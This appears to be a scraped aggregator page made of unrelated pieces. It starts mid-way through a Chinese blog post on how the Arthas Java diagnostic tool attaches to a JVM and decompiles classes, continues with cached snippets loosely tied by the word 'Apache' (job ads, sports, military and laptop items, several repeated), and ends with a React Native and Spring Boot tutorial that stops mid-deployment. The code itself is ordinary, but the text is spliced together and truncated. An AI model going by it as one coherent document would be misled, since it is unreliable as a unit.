                    virtualMachine = VirtualMachine.attach("" + configure.getJavaPid());
                } else {
                    virtualMachine = VirtualMachine.attach(virtualMachineDescriptor);
                }
    
                Properties targetSystemProperties = virtualMachine.getSystemProperties();
                String targetJavaVersion = targetSystemProperties.getProperty("java.specification.version");
                String currentJavaVersion = System.getProperty("java.specification.version");
                if (targetJavaVersion != null && currentJavaVersion != null) {
                    if (!targetJavaVersion.equals(currentJavaVersion)) {
                        AnsiLog.warn("Current VM java version: {} do not match target VM java version: {}, attach may fail.",
                                        currentJavaVersion, targetJavaVersion);
                        AnsiLog.warn("Target VM JAVA_HOME is {}, try to set the same JAVA_HOME.",
                                        targetSystemProperties.getProperty("java.home"));
                    }
                }
    
                virtualMachine.loadAgent(configure.getArthasAgent(),
                                configure.getArthasCore() + ";" + configure.toString());
            } finally {
                if (null != virtualMachine) {
                    virtualMachine.detach();
                }
            }
        }

    通过VirtualMachine, 可以attach到当前指定的pid上,或者是通过VirtualMachineDescriptor实现指定进程的attach,最核心的就是这一句:

    virtualMachine.loadAgent(configure.getArthasAgent(),
                                configure.getArthasCore() + ";" + configure.toString());
    

    这样,就和指定进程的 VM建立了连接,此时就可以进行通信啦。

    类的反编译实现

    我们在问题诊断中,有些时候需要了解当前加载的 class 对应的内容,方便确认加载的类是否正确等,一般通过javap只能显示类似摘要的内容,并不直观。 在桌面端我们可以通过jd-gui之类的工具,在命令行里一般可选的不多。
    Arthas 则集成了这一功能。
    大致的步骤如下:

    1. 通过指定class名称的内容,先进行类的查找

    2. 根据选项,判断是否进行Inner Class之类的查找

    3. 进行反编译

    我们来看 Arthas 的实现。
    对于 VM 中指定名称的 class 的查找,我们看下面这几行代码:

        public void process(CommandProcess process) {
            RowAffect affect = new RowAffect();
            Instrumentation inst = process.session().getInstrumentation();
            Set<Class<?>> matchedClasses = SearchUtils.searchClassOnly(inst, classPattern, isRegEx, code);
    
            try {
                if (matchedClasses == null || matchedClasses.isEmpty()) {
                    processNoMatch(process);
                } else if (matchedClasses.size() > 1) {
                    processMatches(process, matchedClasses);
                } else {
                    Set<Class<?>> withInnerClasses = SearchUtils.searchClassOnly(inst,  classPattern + "(?!.*\\$\\$Lambda\\$).*", true, code);
                    processExactMatch(process, affect, inst, matchedClasses, withInnerClasses);
        }
    

    关键的查找内容,做了封装,在SearchUtils里,这里有一个核心的参数:Instrumentation,都是这个哥们给实现的。

        /**
         * 根据类名匹配,搜已经被JVM加载的类
         *
         * @param inst             inst
         * @param classNameMatcher 类名匹配
         * @return 匹配的类集合
         */
        public static Set<Class<?>> searchClass(Instrumentation inst, Matcher<String> classNameMatcher, int limit) {
            for (Class<?> clazz : inst.getAllLoadedClasses()) {
                if (classNameMatcher.matching(clazz.getName())) {
                    matches.add(clazz);
                }
            }
            return matches;
        }

    inst.getAllLoadedClasses(),它才是背后的大玩家。
    查找到了 Class 之后,怎么反编译的呢?

     private String decompileWithCFR(String classPath, Class<?> clazz, String methodName) {
            List<String> options = new ArrayList<String>();
            options.add(classPath);
    //        options.add(clazz.getName());
            if (methodName != null) {
                options.add(methodName);
            }
            options.add(OUTPUTOPTION);
            options.add(DecompilePath);
            options.add(COMMENTS);
            options.add("false");
            String args[] = new String[options.size()];
            options.toArray(args);
            Main.main(args);
            String outputFilePath = DecompilePath + File.separator + Type.getInternalName(clazz) + ".java";
            File outputFile = new File(outputFilePath);
            if (outputFile.exists()) {
                try {
                    return FileUtils.readFileToString(outputFile, Charset.defaultCharset());
                } catch (IOException e) {
                    logger.error(null, "error read decompile result in: " + outputFilePath, e);
                }
            }
    
            return null;
        }

    通过这样一个方法:decompileWithCFR,所以我们大概了解到反编译是通过第三方工具「CFR」来实现的。上面的代码也是拼 Option然后传给 CFR的 Main方法实现,再保存下来。感兴趣的朋友可以查询benf cfr了解具体用法。

    查询加载类的实现

    看过上面反编译 class 的内容之后,我们知道封装了一个SearchUtil的类,后面许多地方都会用到,而且上面反编译也是在查询到类的之后再进行的。查询的过程,也是在Instrument的基础之上,再加上各种匹配规则过滤,所以更多的具体内容不再赘述。

    我们发现上面几个功能的实现中,有两个关键的东西:

    • VirtualMachine

    • Instrumentation

    Arthas 的整体逻辑也是在 Java 的 Instrumentation基础上来实现,所有在加载的类会通过Agent的加载, 通过addTransformer之后,进行增强,然后将对应的Advice织入进去,对于类的查找,方法的查找,都是通过SearchUtil来进行的,通过Instrument的loadAllClass方法将所有的JVM加载的class按名字进行匹配,一致的会进行返回。

    Instrumentation 是个好同志! :)

    相关阅读

    1. 读源码时,我们到底在读什么?

    2. 怎样阅读源代码?

    3. 一款功能强大的Tomcat 管理监控工具

    4. Java七武器系列多情环 --多功能Profiling工具 JVisual VM

    5. Java七武器系列长生剑 -- Java虚拟机的显微镜 Serviceability Agent

    关注『 Tomcat那些事儿 ,发现更多精彩文章!了解各种常见问题背后的原理与答案。深入源码,分析细节,内容原创,欢迎关注。

    image

    转发是最大的支持,谢谢

    更多精彩内容:

    一台机器上安装多个Tomcat 的原理(回复001)

    监控Tomcat中的各种数据 (回复002)

    启动Tomcat的安全机制(回复003)

    乱码问题的原理及解决方式(回复007)

    Tomcat 日志工作原理及配置(回复011)

    web.xml 解析实现(回复 012)

    线程池的原理( 回复 014)

    Tomcat 的集群搭建原理与实现 (回复 015)

    类加载器的原理 (回复 016)

    类找不到等问题 (回复 017)

    代码的热替换实现(回复 018)

    Tomcat 进程自动退出问题 (回复 019)

    为什么总是返回404? (回复 020)

    ...

    PS: 对于一些 Tomcat常见问,在公众号的【常见问题】菜单中,有需要的朋友欢迎关注查看。


              A Carlos Tevez le preguntaron si River es el que mejor juega y su confesión dejó a todos descolocados      Cache   Translate Page      
    El Apache también le bajó el tono a la posibilidad de una final de Copa Libertadores histórica y pidió concentrarse en el Palmeira./n
              Tecnico sistemas Linux - PUE - Madrid, España      Cache   Translate Page      
    Funciones: Administrador de Sistemas que estará habituado a trabajar en entornos críticos y con requerimientos de alta disponibilidad. Sus responsabilidades y conocimientos serán en cuanto a sistemas operativos y tecnologías utilizadas: Instalación, configuración y mantenimiento de SO Linux RHEL y CentOS. Conocimientos de Scripting bash. Instalación, configuración y mantenimiento de servidores web Apache. Seguridad y bastionado del sistema operativo Instalación, configuración y...
              (IT) Lead Data Engineer      Cache   Translate Page      

    Location: Merrimack New Hampshire   

    Title: Lead Data Engineer Location: Merrimack, NH Duration: Long Term Contract (up to 24 months) Job Description Design, build, and implement scalable streaming data pipelines and ETL frameworks to increase data access and decrease analysis and decision times across the organization Own software throughout the entire development life cycle - design, code, test, automate & deploy Share ideas to improve our product and processes, and provide feedback Job Requirements 15+ years of experience in defining data architecture solutions and establishing common data capabilities for enterprises Proven experience in creating actionable Data and Analytics strategies for Compliance, Risk, Financial Intelligence business functions Experience in defining technology blueprints, roadmaps and collaboratively defining solutions and enabling architecture capabilities Experience in tool selection, conducting rapid PoCs and recommending use case appropriate technologies 6+ years of experience building distributed solutions in Spark, MapReduce and other MPP system with associated data models and datastores (eg, Redshift, Cassandra, HBase, Parquet) 2+ years of experience working with AWS Cloud data engineering stack including EC2, S3, EMR, Kinesis, Glue and other AWS Services Hands-on experience with Apache Ni-Fi, Kafka, Python, Spark preferably on AWS Experience with structured/unstructured/semi-structured data ingestion and processing Experience with automation and deployment (Jenkins, CloudFormation, Chef etc.) Experience writing high quality code in Python and one another OOP language (Java, Scala, C++, Go, etc.) Experience working with RDBM systems, particularly familiarity with SQL
     
    Type: Contract
    Location: Merrimack New Hampshire
    Country: United States of America
    Contact: Naveen Surisetty
    Advertiser: Software Specialists
    Email: Naveen.Surisetty.3F476.EC11C@apps.jobserve.com
    Reference: JS

              SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
    PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
    From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
              Resource Streams in Apache Sling      Cache   Translate Page      

    Latest Feature in Apache Sling: Resource Streams!


              SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
    PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
    From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
              SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
    PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
    From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
              Software Engineer (careC2 Developers) - Leidos - Morgantown, WV      Cache   Translate Page      
    Familiarity with NoSql databases (Apache Accumulo, MongoDB, etc.). The Leidos Health Products &amp; Service Group has an opening for a Software Developers with...
    From Leidos - Thu, 20 Sep 2018 06:24:17 GMT - View all Morgantown, WV jobs
              Junior Software Engineer - Leidos - Morgantown, WV      Cache   Translate Page      
    Familiarity with NoSql databases (Apache Accumulo, MongoDB, etc.). Leidos has job opening for a Junior Software Engineer in Morgantown, WV....
    From Leidos - Thu, 30 Aug 2018 17:27:07 GMT - View all Morgantown, WV jobs
              SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
    PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
    From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
              Developer Enterprise Data Integration - Wipro LTD - McLean, VA      Cache   Translate Page      
    Mandatory Skills: Ab Initio Desirable Skills: Amazon Web Services - AWS, Apache Spark Job Description: Key skills required for the job are: Ab Initio-L3 ...
    From Wipro LTD - Wed, 03 Oct 2018 10:48:05 GMT - View all McLean, VA jobs
              Army to upgrade engines on Apache, Black Hawk helos      Cache   Translate Page      
    The Army soon will choose a team to engineer and develop its improved turbine engine program, which will replace engines that -More

              HealthWalk(헬스워크) - 박상철 (팀노바 응용2단계작품)      Cache   Translate Page      
    <작품 이름> HealthWalk(헬스워크) <작품 설명> 헬스장 위치 정보 제공 및 만보기 기능이 있는 서비스 <사용 기술> • Language: Java, PHP • OS: Android, Linux(Ubutu) • Web Server : Apache • Database : MySQL • Protocol : HTTP, TCP • API : 다음지도api • Library gson, tedpermission, circleimageview, picasso, glide, volley, okhttp, slidinguppanel, crop, stetho, firebase-core, firebase-messaging, eazegraph, MPAndroidChart <기능> - 회원 가입 및 로그인, 프로필 설정 • 회원가입할때 기업회원과 일반회원으로 나누어서 가입 • 기업회원은 본인의 헬스장을 등록하여 홍보 할 수 있음 - 걸.......
              C.H. Robinson Worldwide Becomes #9 Most Shorted S&P 500 Component, Replacing Apache      Cache   Translate Page      

    Click to view a price quote on CHRW.

    Click to research the Transportation industry.

              Enhance Security with Apache Kafka 2.0 and Confluent Platform 5.0      Cache   Translate Page      
    As customers across verticals like finance, healthcare, state and local government and education adopt Confluent Platform for mission-critical data, security becomes more and more important. In the latest release of […]
              MSI GE72MVR Apache Pro-080 Core i7 17.3" Gaming Laptop $1189 at Newegg      Cache   Translate Page      

    Newegg.com has the MSI GE72MVR Apache Pro-080 Core i7 17.3" Gaming Laptop for $1349 - $10 off with coupon code EMCEPPY46 - $150 Rebate (Exp 10/31) = $1189 with free shipping.

    • 17.3" Full HD 1920 x 1080 120 Hz 5 ms 94% NTSC, GeForce GTX 1070 8 GB GDDR5, 1 x USB 3.1 Type-C 2 x USB 3.0 1 x USB 2.0
    • GeForce GTX 1070 8 GB GDDR5, Quad Core Intel Core i7-7700HQ (2.80 GHz), 16 GB Memory 1 TB HDD 128 GB NVMe SSD
    • $1,479 at Amazon

              Build a Mobile App with React Native and Spring Boot      Cache   Translate Page      

    React Native is a framework for building mobile applications with React. React allows you to use a declarative style of programming to describe how your UI should look. It uses embedded HTML (called JSX) to render buttons, lists, scrollable views, and many other components.

    I’m a seasoned Java and JavaScript developer that loves Spring and TypeScript. Some might call me a Java hipster because I like JavaScript. In this post, I’m going to show you how to build a Spring Boot API that talks to a PostgreSQL database. You’ll use Elasticsearch to make your data searchable. You’ll also learn how to deploy it to Cloud Foundry, and Google Cloud Platform using Kubernetes.

    The really cool part is you’ll see how to build a mobile app with React Native. React Native allows you to build mobile apps with the web technologies you know and love: React and JavaScript! I’ll show you how to test it on device emulators and deploy it to your phone. Giddyup!

    Create a Spring Boot App

    In my recent developer life, I built an app to help me track and monitor my health. I came up with the idea while writing the JHipster Mini-Book. I was inspired by Spring Boot’s Actuator, which helps you monitor the health of your Spring Boot app. The app is called 21-Points Health and you can find its source code on GitHub.

    21-Points Health uses a 21-point system to see how healthy you are being each week. Its rules are simple: you can earn up to three points per day for the following reasons:

    1. If you eat healthy, you get a point. Otherwise, zero.

    2. If you exercise, you get a point.

    3. If you don’t drink alcohol, you get a point.

    I’m going to cheat a bit in this tutorial. Rather than writing every component line-by-line, I’m going to generate the API and the app using JHipster and Ignite JHipster.

    What is JHipster?

    I’m glad you asked! It’s an Apache-licensed open source project that allows you to generate Spring Boot APIs, as well as Angular or React UIs. It includes support for generating CRUD screens and adding all the necessary plumbing. It even generates microservice architectures!

    Ignite JHipster is a complementary feature of JHipster. It’s a blueprint template for the Ignite CLI project. Ignite CLI is open source and MIT licensed, produced by the good folks at Infinite Red. Ignite CLI allows you to generate React Native apps in seconds with a number of components pre-integrated. I was blown away the first time I saw a demo of it from Gant Laborde.

    To get things moving quickly, I ran jhipster export-jdl to export an entity definition from 21-Points Health. After exporting the entity definitions, I used JDL-Studio to create an application definition for my project. Then I clicked the download icon to save the file to my hard drive.

    JDL-Studio

    The code you see below is called JDL, or JHipster Domain Language. It was initially designed for JHipster to allow multiple entities and specifying all their attributes, relationships, and pagination features. It’s recently been enhanced to allow generating whole apps from a single file! 💥

    application {
      config {
        applicationType monolith,
        baseName HealthPoints
        packageName com.okta.developer,
        authenticationType oauth2,
        prodDatabaseType postgresql,
        buildTool gradle,
        searchEngine elasticsearch,
        testFrameworks [protractor],
        clientFramework react,
        useSass true,
        enableTranslation true,
        nativeLanguage en,
        languages [en, es]
      }
      entities Points, BloodPressure, Weight, Preferences
    }
    
    // JDL definition for application 'TwentyOnePoints' generated with command 'jhipster export-jdl'
    
    entity BloodPressure {
      timestamp ZonedDateTime required,
      systolic Integer required,
      diastolic Integer required
    }
    entity Weight {
      timestamp ZonedDateTime required,
      weight Double required
    }
    entity Points {
      date LocalDate required,
      exercise Integer,
      meals Integer,
      alcohol Integer,
      notes String maxlength(140)
    }
    entity Preferences {
      weeklyGoal Integer required min(10) max(21),
      weightUnits Units required
    }
    
    enum Units {
      KG,
      LB
    }
    
    relationship OneToOne {
      Preferences{user(login)} to User
    }
    relationship ManyToOne {
      BloodPressure{user(login)} to User,
      Weight{user(login)} to User,
      Points{user(login)} to User
    }
    
    paginate BloodPressure, Weight with infinite-scroll
    paginate Points with pagination

    Create a new directory, with a jhipster-api directory inside it.

    mkdir -p react-native-spring-boot/jhipster-api

    Copy the JDL above into an app.jh file inside the react-native-spring-boot directory. Install JHipster using npm.

    npm i -g generator-jhipster@5.4.2

    Navigate to the jhipster-api directory in a terminal window. Run the command below to generate an app with a plethora of useful features out-of-the-box.

    jhipster import-jdl ../app.jh

    Run Your Spring Boot App

    This app has a number of technologies and features specified as part of its application configuration, including OIDC auth, PostgreSQL, Gradle, Elasticsearch, Protractor tests, React, and Sass. Not only that, it even has test coverage for most of its code!

    To make sure your app is functional, start a few Docker containers for Elasticsearch, Keycloak, PostgreSQL, and Sonar. The commands below should be run from the jhipster-api directory.

    docker-compose -f src/main/docker/elasticsearch.yml up -d
    docker-compose -f src/main/docker/keycloak.yml up -d
    docker-compose -f src/main/docker/postgresql.yml up -d
    docker-compose -f src/main/docker/sonar.yml up -d

    The containers might take a bit to download, so you might want to grab a coffee, or a glass of water.

    While you’re waiting, you can also commit your project to Git. If you have Git installed, JHipster will run git init in your jhipster-api directory. Since you’re putting your Spring Boot app and React Native app in the same repository, remove .git from jhipster-api and initialize Git in the parent directory.

    rm -rf jhipster-api/.git
    git init
    git add .
    git commit -m "Generate Spring Boot API"

    Ensure Test Coverage with Sonar

    JHipster generates apps with high code quality. Code quality is analyzed using SonarCloud, which is automatically configured by JHipster. The "code quality" metric is determined by the percentage of code that is covered by tests.

    Once all the Docker containers have finished starting, run the following command to prove code quality is 👍 (from the jhipster-api directory).

    ./gradlew -Pprod clean test sonarqube
    If you don’t commit your project to Git, the sonarqube task might fail.

    Once this process completes, an analysis of your project will be available on the Sonar dashboard at http://127.0.0.1:9001. Check it - you have a triple-A-rated app! Not bad, eh?

    Sonar AAA

    Create a React Native App for Your Spring Boot API

    You can build a React Native app for your Spring Boot API using Ignite JHipster, created by Jon Ruddell. Jon is one of the most prolific JHipster contributors. ❤️

    Ignite JHipster

    Install Ignite CLI:

    npm i -g ignite-cli@2.1.2 ignite-jhipster@1.12.1

    Make sure you’re in the react-native-spring-boot directory, then generate a React Native app.

    ignite new HealthPoints -b ignite-jhipster

    When prompted for the path to your JHipster project, enter jhipster-api.

    When the project is finished generating, rename HealthPoints to react-native-app, then committed it to Git.

    mv HealthPoints react-native-app
    rm -rf react-native-app/.git
    git add .
    git commit -m "Add React Native app"

    You might notice that two new files were added to your API project.

    create mode 100644 jhipster-api/src/main/java/com/okta/developer/config/ResourceServerConfiguration.java
    create mode 100644 jhipster-api/src/main/java/com/okta/developer/web/rest/AuthInfoResource.java

    These classes configure a resource server for your project (so you can pass in an Authorization header with an access token) and expose the OIDC issuer and client ID via a REST endpoint.

    Modify React Native App for OAuth 2.0 / OIDC Login

    You will need to make some changes to your React Native app so OIDC login works. I’ve summarized them below.

    Update Files for iOS

    If you’d like to run your app on iOS, you’ll need to modify react-native-app/ios/HealthPoints/AppDelegate.m to add an openURL() method and an import at the top.

    #import <React/RCTLinkingManager.h>

    Then add the method before the @end at the bottom of the file.

    - (BOOL)application:(UIApplication *)application
               openURL:(NSURL *)url
               options:(NSDictionary<UIApplicationOpenURLOptionsKey,id> *)options
    {
     return [RCTLinkingManager application:application openURL:url options:options];
    }

    You’ll also need to configure your iOS URL scheme. Run open ios/HealthPoints.xcodeproj to open the project in Xcode. Navigate to Project > Info > URL Types and specify healthpoints like in the screenshot below.

    Xcode URL Scheme

    You can also modify ios/HealthPoints/Info.plist if you’d rather not use Xcode.

            <key>CFBundleSignature</key>
            <string>????</string>
    +       <key>CFBundleURLTypes</key>
    +       <array>
    +               <dict>
    +                       <key>CFBundleTypeRole</key>
    +                       <string>Editor</string>
    +                       <key>CFBundleURLName</key>
    +                       <string>healthpoints</string>
    +                       <key>CFBundleURLSchemes</key>
    +                       <array>
    +                               <string>healthpoints</string>
    +                       </array>
    +               </dict>
    +       </array>
            <key>CFBundleVersion</key>

    Update Files for Android

    To make the Android side of things aware of your URL scheme, add it to android/app/src/main/AndroidManifest.xml. The following XML should go just after the existing <intent-filter>.

    <intent-filter>
        <action android:name="android.intent.action.MAIN" />
        <category android:name="android.intent.category.LAUNCHER" />
        <data android:scheme="healthpoints" />
    </intent-filter>

    Update Keycloak’s Redirect URI

    You will also need to update Keycloak to know your app’s URL scheme because it’s used as a redirect URI. Open http://localhost:9080/auth/admin in your browser and log in with admin/admin. Navigate to Clients > web_app and add healthpoints://authorize as a valid redirect URI.

    Valid Redirect URIs

    Run Your React Native App on iOS

    To run your React Native app, you’ll need to start your Spring Boot app first. Navigate to the jhipster-api directory and run ./gradlew. In another terminal window, navigate to react-native-app and run react-native run-ios.

    If you get an error Print: Entry, ":CFBundleIdentifier", Does Not Exist, run rm -rf ~/.rncache and try again.

    Verify you can log in by clicking the hamburger menu in the top left corner, then Login. Use "admin" for the username and password.

    Ignite JHipster with Keycloak
    To enable live-reloading of your code in iOS Simulator, first click on the emulator, then press +R.

    Run Your React Native App on Android

    To run your app on an Android emulator, run react-native run-android. If you don’t have a phone plugged in or an Android Virtual Device (AVD) running, you’ll see an error:

    Could not install the app on the device, read the error above for details.

    To fix this, open Android Studio, choose open existing project, and select the android directory in your project. If you’re prompted to "Install Build Tools and sync project," do it.

    To create a new AVD, navigate to Tools > Android > AVD Manager. Create a new Virtual Device and click Play. I chose a Pixel 2 as you can see from my settings below.

    AVD Pixel 2

    To make Keycloak and your API work with Android in an emulator, you’ll have to change all localhost links to 10.0.2.2. See Android Emulator networking for more information.

    This means you’ll need to update src/main/resources/config/application.yml in the JHipster app to the following.

    security:
        oauth2:
            client:
                access-token-uri: http://10.0.2.2:9080/auth/realms/jhipster/protocol/openid-connect/token
                user-authorization-uri: http://10.0.2.2:9080/auth/realms/jhipster/protocol/openid-connect/auth
                client-id: web_app
                client-secret: web_app
                scope: openid profile email
            resource:
                user-info-uri: http://10.0.2.2:9080/auth/realms/jhipster/protocol/openid-connect/userinfo

    You’ll also need to update apiUrl in your React Native app’s App/Config/AppConfig.js.

    export default {
      apiUrl: 'http://10.0.2.2:8080/',
      appUrlScheme: 'healthpoints'
    }

    Run react-native run-android again. You should be able to log in just like you did on iOS. Unfortunately, I wasn’t able to make it work. Even if I was able to make it work, it’d make it impossible to log in to the React app in the JHipster app because your local server wouldn’t know where 10.0.2.2 is. This was a bad developer experience for me. The good news is everything works with Okta (which I’ll get to in a minute).

    To enable live-reloading of code on Android, first click on the emulator, then press Ctrl+M (+M on MacOS) or shake the Android device which has the running app. Then select the Enable Live Reload option from the popup.

    For the rest of this tutorial, I’m going to show all the examples on iOS, but you should be able to use Android if you prefer.

    Generate CRUD Pages in React Native App

    To generate pages for managing entities in your Spring Boot API, run the following command in the react-native-app directory.

    ignite generate import-jdl ../app.jh

    Run react-native run-ios, log in, and click the Entities menu item. You should see a screen like the one below.

    Ignite JHipster Entities Screen

    Click on Points and you should be able to add points.

    Create Points Screen

    Tweak React Native Points Edit Screen to use Toggles

    The goal of my 21-Points Health app is to count the total number of health points you get in a week, with the max being 21. For this reason, I think it’s a good idea to change the integer inputs on exercise, meals, and alcohol to be toggles instead of raw integers. If the user toggles it on, the app should store the value as "1". If they toggle it off, it should record "0".

    To make this change to the React Native app, open App/Containers/PointEntityEditScreen.js in your favorite editor. Change the formModel to use t.Boolean for exercise, meals, and alcohol.

    formModel: t.struct({
      id: t.maybe(t.Number),
      date: t.Date,
      exercise: t.maybe(t.Boolean),
      meals: t.maybe(t.Boolean),
      alcohol: t.maybe(t.Boolean),
      notes: t.maybe(t.String),
      userId: this.getUsers()
    }),

    Then change the entityToFormValue() and formValueToEntity() methods to save 1 or 0, depending on the user’s selection.

    entityToFormValue = (value) => {
      if (!value) {
        return {}
      }
      return {
        id: value.id || null,
        date: value.date || null,
        exercise: value.exercise === 1 ? true : false,
        meals: value.meals === 1 ? true : false,
        alcohol: value.alcohol === 1 ? true : false,
        notes: value.notes || null,
        userId: (value.user && value.user.id) ? value.user.id : null
      }
    }
    formValueToEntity = (value) => {
      return {
        id: value.id || null,
        date: value.date || null,
        exercise: (value.exercise) ? 1 : 0,
        meals: (value.meals) ? 1 : 0,
        alcohol: (value.alcohol) ? 1 : 0,
        notes: value.notes || null,
        user: value.userId ? { id: value.userId } : null
      }
    }

    While you’re at it, you can change the default Points entity to have today’s date and true for every point by default. You can make this happen by modifying componentWillMount() and changing the formValue.

    componentWillMount () {
      if (this.props.entityId) {
        this.props.getPoint(this.props.entityId)
      } else {
        this.setState({formValue: {date: new Date(), exercise: true, meals: true, alcohol: true}})
      }
      this.props.getAllUsers()
    }

    Refresh your app in Simulator using ⌘ + R. When you create new points, you should see your new defaults.

    Create Points with defaults

    Tweak React App’s Points to use Checkboxes

    Since your JHipster app has a React UI as well, it makes sense to change the points input/edit screen to use a similar mechanism: checkboxes. Open jhipster-api/src/main/webapp/…​/points-update.tsx and replace the TSX (the T is for TypeScript) for the three fields with the following. You might notice the trueValue and falseValue attributes handle converting checked to true and vise versa.

    jhipster-api/src/main/webapp/app/entities/points/points-update.tsx
    <AvGroup check>
      <AvInput id="points-exercise" type="checkbox" className="form-control"
        name="exercise" trueValue={1} falseValue={0} /> // (1)
      <Label check id="exerciseLabel" for="exercise">
        <Translate contentKey="healthPointsApp.points.exercise">Exercise</Translate>
      </Label>
    </AvGroup>
    <AvGroup check>
      <AvInput id="points-meals" type="checkbox" className="form-control"
        name="meals" trueValue={1} falseValue={0} />
      <Label check id="mealsLabel" for="meals">
        <Translate contentKey="healthPointsApp.points.meals">Meals</Translate>
      </Label>
    </AvGroup>
    <AvGroup check>
      <AvInput id="points-alcohol" type="checkbox" className="form-control"
        name="alcohol" trueValue={1} falseValue={0} />
      <Label check id="alcoholLabel" for="alcohol">
        <Translate contentKey="healthPointsApp.points.alcohol">Alcohol</Translate>
      </Label>
    </AvGroup>

    In the jhipster-api directory, run npm start (or yarn start) and verify your changes exist. The screenshot below shows what it looks like when editing a record entered by the React Native app.

    checkboxes in React app

    Use Okta’s API for Identity

    Switching from Keycload to Okta for identity in a JHipster app is suuuper easy thanks to Spring Boot and Spring Security. First, you’ll need an Okta developer account. If you don’t have one already, you can signup at developer.okta.com/signup. Okta is an OIDC provider like Keycloak, but it’s always on, so you don’t have to manage it.

    Okta Developer Signup

    Log in to your Okta Developer account and navigate to Applications > Add Application. Click Web and click Next. Give the app a name you’ll remember, and specify http://localhost:8080/login and healthpoints://authorize as Login redirect URIs. Click Done, then edit it again to select "Implicit (Hybrid)" + allow ID and access tokens. Note the client ID and secret, you’ll need to copy/paste them into a file in a minute.

    Create a ROLE_ADMIN and ROLE_USER group (Users > Groups > Add Group) and add users to them. I recommend adding the account you signed up with to ROLE_ADMIN and creating a new user (Users > Add Person) to add to ROLE_USER.

    Navigate to API > Authorization Servers and click the one named default to edit it. Click the Claims tab and Add Claim. Name it "roles", and include it in the ID Token. Set the value type to "Groups" and set the filter to be a Regex of .*. Click Create to complete the process.

    Create a file on your hard drive called ~/.okta.env and specify the settings for your app in it.

    #!/bin/bash
    export SECURITY_OAUTH2_CLIENT_ACCESS_TOKEN_URI="/oauth2/default/v1/token"
    export SECURITY_OAUTH2_CLIENT_USER_AUTHORIZATION_URI="/oauth2/default/v1/authorize"
    export SECURITY_OAUTH2_RESOURCE_USER_INFO_URI="/oauth2/default/v1/userinfo"
    export SECURITY_OAUTH2_CLIENT_CLIENT_ID="{yourClientId}"
    export SECURITY_OAUTH2_CLIENT_CLIENT_SECRET="{yourClientSecret}"
    Make sure your *URI variables do not have -admin in them. This is a common mistake.

    In the terminal where your Spring Boot app is running, kill the process, run source ~/.okta.env and run ./gradlew again. You should be able to log in at http://localhost:8080 in your React Native app (after you refresh or restart it).

    Okta Login in React Native

    Debugging React Native Apps

    If you have issues, or just want to see what API calls are being made, you can use Reactotron. Reactotron is a desktop app for inspecting your React and React Native applications. It should work with iOS without any changes. For Android, you’ll need to run adb reverse tcp:9090 tcp:9090 after your AVD is running.

    Once it’s running, you can see API calls being made, as well as log messages.

    Reactotron

    If you’d like to log your own messages to Reactotron, you can use console.tron.log('debug message').

    Packaging Your React Native App for Production

    The last thing I’d like to show you to deploy your app to production. Since there are many steps to getting your React Native app onto a physical device, I’ll defer to React Native’s Running on Device documentation. It should be as simple as plugging in your device via USB, configuring code signing, and building/running your app. You’ll also need to configure the URL of where your API is located.

    You know what’s awesome about Spring Boot? There’s a bunch of cloud providers that support it! If a platform supports Spring Boot, you should be able to run a JHipster app on it!

    Follow the instructions below to deploy your API to Pivotal’s Cloud Foundry and Google Cloud Platform using Kubernetes. Both Cloud Foundry and Kubernetes have multiple providers, so these instructions should work even if you’re not using Pivotal or Google.

    Deploy Your Spring Boot API to Cloud Foundry

    JHipster has a Cloud Foundry sub-generator that makes it simple to deploy to Cloud Foundry. It only requires you run one command. However, you have Elasticsearch configured in your API and the sub-generator doesn’t support automatically provisioning an Elasticsearch instance for you. To workaround this limitation, modify jhipster-api/src/main/resources/config/application-prod.yml and find the following configuration for Spring Data Jest:

    data:
        jest:
            uri: http://localhost:9200

    Replace it with the following, which will cause Elasticsearch to run in embedded mode.

    data:
        elasticsearch:
            properties:
                path:
                    home: /tmp/elasticsearch

    You’ll also need to remove a couple of properties, due to an issue I discovered in JHipster.

    @@ -30,15 +30,12 @@ spring:
             url: jdbc:postgresql://localhost:5432/HealthPoints
             username: HealthPoints
             password:
    -        hikari:
    -            auto-commit: false
         jpa:
             database-platform: io.github.jhipster.domain.util.FixedPostgreSQL82Dialect
             database: POSTGRESQL
             show-sql: false
             properties:
                 hibernate.id.new_generator_mappings: true
    -            hibernate.connection.provider_disables_autocommit: true
                 hibernate.cache.use_second_level_cache: true
                 hibernate.cache.use_query_cache: false
                 hibernate.generate_statistics: false

    To deploy everything on Cloud Foundry with Pivotal Web Services, you’ll need to create an account, download/install the Cloud Foundry CLI, and sign-in (using cf login -a api.run.pivotal.io).

    You may receive a warning after logging in No space targeted, use 'cf target -s SPACE'. If you do, log in to https://run.pivotal.io in your browser, create a space, then run the command as recommended.

    Then run jhipster cloudfoundry in the jhipster-api directory. You can see the values I chose when prompted below.

    CloudFoundry configuration is starting
    ? Name to deploy as? HealthPoints
    ? Which profile would you like to use? prod
    ? What is the name of your database service? elephantsql
    ? What is the name of your database plan? turtle

    When prompted to overwrite build.gradle, type a.

    The first time I ran jhipster cloudfoundry, it didn’t work. Running it a second time succeeded.
    source ~/.okta.env
    export CF_APP_NAME=healthpoints
